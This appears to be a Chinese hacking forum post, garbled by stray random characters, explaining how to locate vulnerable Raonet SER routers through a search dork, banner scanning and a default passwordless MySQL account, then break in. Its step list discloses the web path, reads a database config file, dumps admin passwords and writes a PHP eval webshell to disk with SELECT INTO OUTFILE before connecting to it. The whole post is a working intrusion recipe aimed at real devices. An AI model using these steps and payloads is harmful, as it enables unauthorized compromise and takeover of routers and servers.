寻找存在漏洞的路由器方法:
2 L- j6 E5 G" O7 z- a7 r2 E( R
6 J2 s) }: h" s* s1 m* J+ j1:google搜索'Raonet Subscriber Ethernet Router'
9 q1 s+ u) X) Y* b( q( f
4 |, T( D U& j6 H2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001 i8 s" R6 ?7 K2 u1 Y- l5 m
% l2 L1 j& {2 B) H+ ^) M3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。$ G1 Z& i: V# N: d
7 q! |- h: Y4 m, ?- m
//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成......
+ y; i# s1 v! n t' x0 d
2 g# `- s& j' F& D 2 i( x0 G' w3 K1 m; ^
S( Z) r* x5 W' I b! V, ~, W1 E入侵步骤:& U0 N/ j+ W% P4 m8 ^; D6 o
; c0 X! A# i/ L5 g
1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
8 A- n3 M; Y. U5 z W& |9 O% H; r' S6 E8 z
2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc+ e0 G( T8 t3 K4 z* j* ?! s% Z# v
3:得到密码后连接,查看GUI管理密码:% U" a6 E3 k! T* q R, I
use ser_500" A1 o- c% {1 Q5 \) Y7 b9 C4 S
select id,passwd from user;! T1 ?6 {, F4 r
4:通过数据库写入webshell,执行命令:
. [# g& H. w* ], o0 E( ]use mysql;
) f& K5 j) D0 @% \+ u) p7 }create table ok(cmd TEXT);1 q# D3 e4 o2 \8 D* J0 z
insert into ok values("<?php @eval($_POST[cmd])?>");
$ x3 E- K! q1 g! J. d% x. Z1 Pselect * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";
7 L0 N4 w; Q G4 m+ wdrop table ok;# v" {3 J/ M; \2 A
! f' i% v% O+ J
5:连接后门shell.php 2 p$ w/ J1 E/ \# ], P6 X: z
- ?0 @$ {% Y# L6 X
6. 搞定!& u4 ^' M4 N: t) E' h( b/ Y) I& r
, k) O1 r% |+ ]2 h8 e* f
|